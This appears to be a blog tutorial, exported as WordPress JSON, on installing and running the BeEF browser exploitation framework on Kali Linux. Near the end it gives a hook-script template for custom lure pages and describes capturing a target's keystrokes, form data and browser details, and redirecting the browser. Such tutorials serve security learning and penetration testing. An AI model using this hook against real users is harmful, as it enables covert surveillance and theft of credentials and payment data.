{"id":845,"date":"2023-02-10T05:57:53","date_gmt":"2023-02-10T04:57:53","guid":{"rendered":"https:\/\/infosecscout.com\/?p=845"},"modified":"2023-11-22T12:58:21","modified_gmt":"2023-11-22T11:58:21","slug":"use-beef-on-kali-linux","status":"publish","type":"post","link":"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/","title":{"rendered":"Getting Started with BeEF on Kali Linux: A Complete Guide"},"content":{"rendered":"\n<p>Kali Linux includes many tools for hacking and pen-testing. You can even install more applications, like BeEF that I&#8217;ll introduce in this article. Not only, this tool has a funny name, but it&#8217;s also one of the best to exploit vulnerabilities via a web browser.<\/p>\n\n\n\n<p><strong>BeEF is not installed by default on Kali Linux, but is available in the default repository. It can be installed via the package manager (APT) by using the command: <em>sudo apt install beef-xss<\/em>. A web interface will then be available on port 3000 to run the tests.<\/strong><\/p>\n\n\n\n<p>Don&#8217;t worry, as always on this website, I&#8217;ll start by the beginning, show you all the installation steps and give you a few examples to get started and understand the main principles.<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_65 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title \" >Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 eztoc-toggle-hide-by-default' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#What_is_BeEF\" title=\"What is BeEF?\">What is BeEF?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#How_to_install_BeEF_on_Kali_Linux\" title=\"How to install BeEF on Kali Linux\">How to install BeEF on Kali Linux<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Update_your_system\" title=\"Update your system\">Update your system<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Install_the_BeEF_package\" title=\"Install the BeEF package\">Install the BeEF package<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Getting_started_with_BeEF_on_Kali_Linux\" title=\"Getting started with BeEF on Kali Linux\">Getting started with BeEF on Kali Linux<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Start_the_service\" title=\"Start the service\">Start the service<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Access_the_web_interface\" title=\"Access the web interface\">Access the web interface<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Play_with_the_demo_pages\" title=\"Play with the demo pages\">Play with the demo pages<\/a><ul class='ez-toc-list-level-4' ><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Basic_example\" title=\"Basic example\">Basic example<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Advanced_example\" title=\"Advanced example\">Advanced example<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Test_from_another_computer\" title=\"Test from another computer\">Test from another computer<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Create_custom_pages\" title=\"Create custom pages\">Create custom pages<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Stop_the_service\" title=\"Stop the service\">Stop the service<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/infosecscout.com\/use-beef-on-kali-linux\/#Going_further_with_BeEF\" title=\"Going further with BeEF\">Going further with BeEF<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"What_is_BeEF\"><\/span>What is BeEF?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><strong>BeEF stands for &#8220;Browser Exploitation Framework&#8221;. <br><\/strong>If you already know Metasploit on Kali Linux, it&#8217;s something similar, but focus on the web browser.<\/p>\n\n\n\n<p>Basically, the idea is to hook the browser from a client on the targeted network to your Kali Linux instance. Once done<strong>, BeEF will record everything happening on the web browser (keyboard, mouse clicks, navigation info, etc.)<\/strong>.<\/p>\n\n\n\n<p>This is typically the kind of attack that will work well for social engineering. If you can get the user to visit your page, you have won. By seeing everything they do in their web browser, you will most likely find a way to access the critical systems.<\/p>\n\n\n\n<p>I&#8217;ll use the included examples at the end of this article, to show you the potential, but you can create your own pages, to fit the target network and get better results.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"How_to_install_BeEF_on_Kali_Linux\"><\/span>How to install BeEF on Kali Linux<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Depending on your Kali Linux version, you may need to install BeEF manually. At least it was the case during my tests, so here are the steps to get it on your system.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Update_your_system\"><\/span>Update your system<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>BeEF is available in the package manager, so the installation is pretty straightforward.<\/p>\n\n\n\n<p>As always, just <strong>start by updating the repositories info with<\/strong>:<br><code>sudo apt update<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"723\" height=\"216\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-apt-update.jpg\" alt=\"\" class=\"wp-image-859\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-apt-update.jpg 723w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-apt-update-300x90.jpg 300w\" sizes=\"(max-width: 723px) 100vw, 723px\" \/><\/figure>\n\n\n\n<p>It&#8217;s not mandatory, but if you get a mention telling you that upgrades are available<strong>, it might be a good idea to keep your system up-to-date<\/strong> (and avoid any conflict later on), with:<br><code>sudo apt upgrade<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Install_the_BeEF_package\"><\/span>Install the BeEF package<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p><strong>Once done, BeEF can then be installed with:<br><\/strong><code>sudo apt install beef-xss<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"810\" height=\"303\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-install.jpg\" alt=\"\" class=\"wp-image-858\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-install.jpg 810w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-install-300x112.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-install-768x287.jpg 768w\" sizes=\"(max-width: 810px) 100vw, 810px\" \/><\/figure>\n\n\n\n<p>Nothing special here, except the package name that you need to know. Kali Linux will automatically add all the dependencies required to use BeEF. It will bring up a web interface, so many additional packages are required, just be patient.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Getting_started_with_BeEF_on_Kali_Linux\"><\/span>Getting started with BeEF on Kali Linux<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>BeEF works as a service, that needs to be started before you can access the web interface where everything is managed.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Start_the_service\"><\/span>Start the service<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p><strong>Once BeEF installed, you can start the corresponding service with:<br><\/strong><code>sudo beef-xss<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"807\" height=\"443\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/beef-start-servie.jpg\" alt=\"\" class=\"wp-image-856\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/beef-start-servie.jpg 807w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/beef-start-servie-300x165.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/beef-start-servie-768x422.jpg 768w\" sizes=\"(max-width: 807px) 100vw, 807px\" \/><\/figure>\n\n\n\n<p>The command output will guide you:<\/p>\n\n\n\n<ul>\n<li><strong>On the first run, you may have to set a password for the default user.<\/strong><\/li>\n\n\n\n<li>Any error or warning about missing dependencies will also be displayed here (there are not mandatory, just for your information).<\/li>\n\n\n\n<li>And it will also give you the web interface URL, which is simply your local IP address with the port 3000 by default.<\/li>\n<\/ul>\n\n\n\n<p>Another option, if you don&#8217;t want to use the terminal, is to find BeEF in the main menu:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"336\" height=\"115\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-menu-beef.jpg\" alt=\"\" class=\"wp-image-857\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-menu-beef.jpg 336w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-menu-beef-300x103.jpg 300w\" sizes=\"(max-width: 336px) 100vw, 336px\" \/><\/figure>\n\n\n\n<p>From there, you can start or stop the service in one click.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Access_the_web_interface\"><\/span>Access the web interface<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p><strong>Once the service started, you can access the BeEF web interface at:<br><\/strong><code>http:\/\/localhost:3000<br><\/code>Or, if you want to access it from another computer, this URL should work too:<br><code>http:\/\/IP:3000<\/code><\/p>\n\n\n\n<p>You should get this login form:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"654\" height=\"333\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-interface-login.jpg\" alt=\"\" class=\"wp-image-855\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-interface-login.jpg 654w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-interface-login-300x153.jpg 300w\" sizes=\"(max-width: 654px) 100vw, 654px\" \/><\/figure><\/div>\n\n\n<p><strong>The default username is &#8220;beef&#8221; and the password is the one you just set while starting the service for the first time.<\/strong><\/p>\n\n\n\n<p>You&#8217;ll get access to the main interface. Everything is empty for now, but I&#8217;ll show you how to use the demo pages to get a better idea on how this tool works.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Play_with_the_demo_pages\"><\/span>Play with the demo pages<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>BeEF includes a few demo pages, to get a better sense of the features and how it works. <br>Let&#8217;s play a bit with them to see what kind of information can be collected with this tool.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Basic_example\"><\/span>Basic example<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>The first page is minimalist. It&#8217;s mostly a text page, with the tool logo, and a form field (textarea) where you can type some text. It looks like that:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"597\" height=\"384\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-basic-type.jpg\" alt=\"\" class=\"wp-image-854\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-basic-type.jpg 597w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-basic-type-300x193.jpg 300w\" sizes=\"(max-width: 597px) 100vw, 597px\" \/><\/figure><\/div>\n\n\n<p><strong>You can access it in your web browser, by opening this URL:<br><\/strong><code>http:\/\/localhost:3000\/demos\/basic.html<\/code><\/p>\n\n\n\n<p>Once the page opened, the BeEF interface will show a new line under &#8220;Online Browsers&#8221;, corresponding to your window or tab opened on the demo page.<\/p>\n\n\n\n<p>Anything you do on this page will be recorded, and you can see the details on the BeEF interface.<br>Here is for example a capture of my tests:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1004\" height=\"316\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-capture-events.jpg\" alt=\"\" class=\"wp-image-853\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-capture-events.jpg 1004w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-capture-events-300x94.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-demo-capture-events-768x242.jpg 768w\" sizes=\"(max-width: 1004px) 100vw, 1004px\" \/><\/figure><\/div>\n\n\n<p>BeEF detected when the tab was on focus or not, what I typed in the form and where I clicked with my mouse (coordinates). Everything is built-in, you don&#8217;t have any complicated command to type or JavaScript code to add in your pages to collect this information.<\/p>\n\n\n\n<p><strong>BeEF will also collect more general data about the user, like:<\/strong><\/p>\n\n\n\n<ul>\n<li>IP address<\/li>\n\n\n\n<li>Device type (desktop in this case)<\/li>\n\n\n\n<li>Operating system information (Linux, distribution, version, etc.)<\/li>\n\n\n\n<li>Details about the web browser<\/li>\n\n\n\n<li>Etc.<\/li>\n<\/ul>\n\n\n\n<p>So, even if the target just opens the page one second and doesn&#8217;t do anything in it, you&#8217;ll already get some useful data about the computer, network and software configuration.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Advanced_example\"><\/span>Advanced example<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<p>Obviously, this was the most basic example, and you can build pages that look more realist.<br>The advanced example looks more like an order page, where you&#8217;ll have a typical form with your name, address and credit card information.<\/p>\n\n\n\n<p>You can click on the link on the basic page to get access to it.<br>It looks like that:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"825\" height=\"520\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced.jpg\" alt=\"\" class=\"wp-image-852\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced.jpg 825w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced-300x189.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced-768x484.jpg 768w\" sizes=\"(max-width: 825px) 100vw, 825px\" \/><\/figure>\n\n\n\n<p>It&#8217;s the same principle, everything I do on this page is recorded and displayed in the BeEF interface.<br><strong>For example, if I fill and submit the form, you&#8217;ll collect all the field values in it:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"722\" height=\"42\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced-capture.jpg\" alt=\"\" class=\"wp-image-851\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced-capture.jpg 722w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-example-advanced-capture-300x17.jpg 300w\" sizes=\"(max-width: 722px) 100vw, 722px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Test_from_another_computer\"><\/span>Test from another computer<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>After testing from your Kali Linux computer, you can do similar tests from another computer and compare the data you&#8217;re collecting.<\/p>\n\n\n\n<p>As I told you previously, you&#8217;ll get many details about the computer and especially the browser used.<br>On this screenshot, you can see that I accessed the page from a Windows computer, IP 192.168.222.11, using Chrome 109.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"996\" height=\"375\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-browser-details.jpg\" alt=\"\" class=\"wp-image-850\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-browser-details.jpg 996w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-browser-details-300x113.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-browser-details-768x289.jpg 768w\" sizes=\"(max-width: 996px) 100vw, 996px\" \/><\/figure>\n\n\n\n<p>Once the browser connected to BeEF, you can also play with the commands available in this tab:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"292\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-redirect.jpg\" alt=\"\" class=\"wp-image-849\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-redirect.jpg 777w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-redirect-300x113.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-redirect-768x289.jpg 768w\" sizes=\"(max-width: 777px) 100vw, 777px\" \/><\/figure>\n\n\n\n<p><strong>I can control the web browser on the remote computer from there. In this example, I redirected it to a specific URL (a login page maybe?), but there are tons of commands you can use to collect even more data about the target. <\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Create_custom_pages\"><\/span>Create custom pages<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Obviously, these pages are just here for the demo, they won&#8217;t work in real life. You&#8217;ll need to create better pages, that look familiar for your target network. It could be a login page for their main application, a page with the company branding, or whatever.<\/p>\n\n\n\n<p><strong>To create custom pages in BeEF, you can create HTML pages in this folder:<br><\/strong><code>\/usr\/share\/beef-xss\/extensions<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"124\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-folder.jpg\" alt=\"\" class=\"wp-image-848\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-folder.jpg 676w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-folder-300x55.jpg 300w\" sizes=\"(max-width: 676px) 100vw, 676px\" \/><\/figure>\n\n\n\n<p>In there, you&#8217;ll find the demos folder we&#8217;ve used until now, with a &#8220;html&#8221; subfolder.<br>If you create a new page here, you&#8217;ll have access to it with a similar URL (demos\/yourpage.html).<\/p>\n\n\n\n<p>To hook this page to BeEF, you just need to create a traditional HTML page, and add this JavaScript code in the header:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;script>\r\n\r   var commandModuleStr = '&lt;script src=\"&lt;%= @hook_uri %>\" type=\"text\/javascript\">&lt;\\\/script>';\r\n\r   document.write(commandModuleStr);\r\n\r&lt;\/script><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"887\" height=\"275\" src=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-custom-page.jpg\" alt=\"\" class=\"wp-image-847\" srcset=\"https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-custom-page.jpg 887w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-custom-page-300x93.jpg 300w, https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/kali-beef-custom-page-768x238.jpg 768w\" sizes=\"(max-width: 887px) 100vw, 887px\" \/><\/figure>\n\n\n\n<p>Here is the full code I used for this test, if you want to copy\/paste it as a template for your new page:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;html&gt;\n        &lt;head&gt;\n                &lt;title&gt;Test page infosec&lt;\/title&gt;\n                &lt;script&gt;\n                var commandModuleStr = '&lt;script src=\"&lt;%= @hook_uri %&gt;\" type=\"text\/javascript\"&gt;&lt;\\\/script&gt;';\n                document.write(commandModuleStr);\n                &lt;\/script&gt;\n        &lt;\/head&gt;\n        &lt;body&gt;\n        &lt;\/body&gt;\n\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Stop_the_service\"><\/span>Stop the service<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Once you are done, you can stop the service from the main menu, or use this command:<br><code>sudo beef-xss-stop -h<\/code><\/p>\n\n\n\n<p>I give it to you because it&#8217;s not the traditional way to handle services on Linux, I had to search for it :-).<\/p>\n\n\n\n<p>Once the service stopped, the BeEF interface is no longer accessible, and none of the pages you have created are available (which is a good thing if you don&#8217;t want to be detected).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Going_further_with_BeEF\"><\/span>Going further with BeEF<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Anyway, I hope this introduction helped you to better understand what is BeEF, how to install it on Kali Linux and how it works. Obviously, this is just an introduction, and you&#8217;ll need to do many tests and probably spend time n the <a href=\"https:\/\/github.com\/beefproject\/beef\/wiki\" target=\"_blank\" rel=\"noreferrer noopener\">official documentation<\/a> to get used to it.<\/p>\n\n\n\n<p>Another option would be to follow one of these great courses, that have lessons on how to use BeEF included:<\/p>\n\n\n\n<ul>\n<li><strong><a href=\"https:\/\/click.linksynergy.com\/deeplink?id=l\/8wfTf\/zSM&amp;mid=39197&amp;murl=https%3A%2F%2Fwww.udemy.com%2Fcourse%2Flearn-ethical-hacking-from-scratch%2F\" target=\"_blank\" rel=\"noreferrer noopener\">Learn Ethical Hacking From Scratch<\/a><br><\/strong>A full course to become an ethical hacker, include a module explaining how to hook victims to BeEF using XSS vulnerabilities.<\/li>\n\n\n\n<li><strong><a href=\"https:\/\/click.linksynergy.com\/deeplink?id=l\/8wfTf\/zSM&amp;mid=39197&amp;murl=https%3A%2F%2Fwww.udemy.com%2Fcourse%2Fethical-hacking-and-penetration-testing-bootcamp-with-linux%2F\" target=\"_blank\" rel=\"noreferrer noopener\">Ethical Hacking and Penetration Testing with Kali Linux<br><\/a><\/strong>Pentesting &amp; Ethical Hacking with Metasploit, Kali Linux, Bug Bounty, Nmap and BeEF.<\/li>\n<\/ul>\n\n\n\n<ul><\/ul>\n\n\n\n<p><strong>Following a video course is the best way to learn that kind of things in my opinion<\/strong>. Not only you&#8217;ll see complete examples on how to use BeEF, but you&#8217;ll get a better overview of all the possibilities on Kali Linux and how to improve your strategy with all the apps available.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kali Linux includes many tools for hacking and pen-testing. You can even install more applications, like BeEF that I&#8217;ll introduce in this article. Not only, this tool has a funny name, but it&#8217;s also one of the best to exploit vulnerabilities via a web browser. BeEF is not installed by default on Kali Linux, but&#8230;<\/p>\n","protected":false},"author":1,"featured_media":862,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kad_blocks_custom_css":"","_kad_blocks_head_custom_js":"","_kad_blocks_body_custom_js":"","_kad_blocks_footer_custom_js":"","_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[16],"tags":[],"taxonomy_info":{"category":[{"value":16,"label":"Kali Linux"}]},"featured_image_src_large":["https:\/\/infosecscout.com\/wp-content\/uploads\/2023\/02\/beef-kali-linux-1024x683.jpg",1024,683,true],"author_info":{"display_name":"Patrick Fromaget","author_link":"https:\/\/infosecscout.com\/about\/"},"comment_info":0,"category_info":[{"term_id":16,"name":"Kali Linux","slug":"kali-linux","term_group":0,"term_taxonomy_id":16,"taxonomy":"category","description":"Jump into our Kali Linux Tutorials. They're perfect for getting the hang of this cool Linux distribution. We make it easy to learn the basics and a bit more!","parent":0,"count":37,"filter":"raw","cat_ID":16,"category_count":37,"category_description":"Jump into our Kali Linux Tutorials. They're perfect for getting the hang of this cool Linux distribution. We make it easy to learn the basics and a bit more!","cat_name":"Kali Linux","category_nicename":"kali-linux","category_parent":0}],"tag_info":false,"_links":{"self":[{"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/posts\/845"}],"collection":[{"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/comments?post=845"}],"version-history":[{"count":11,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/posts\/845\/revisions"}],"predecessor-version":[{"id":871,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/posts\/845\/revisions\/871"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/media\/862"}],"wp:attachment":[{"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/media?parent=845"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/categories?post=845"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosecscout.com\/wp-json\/wp\/v2\/tags?post=845"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}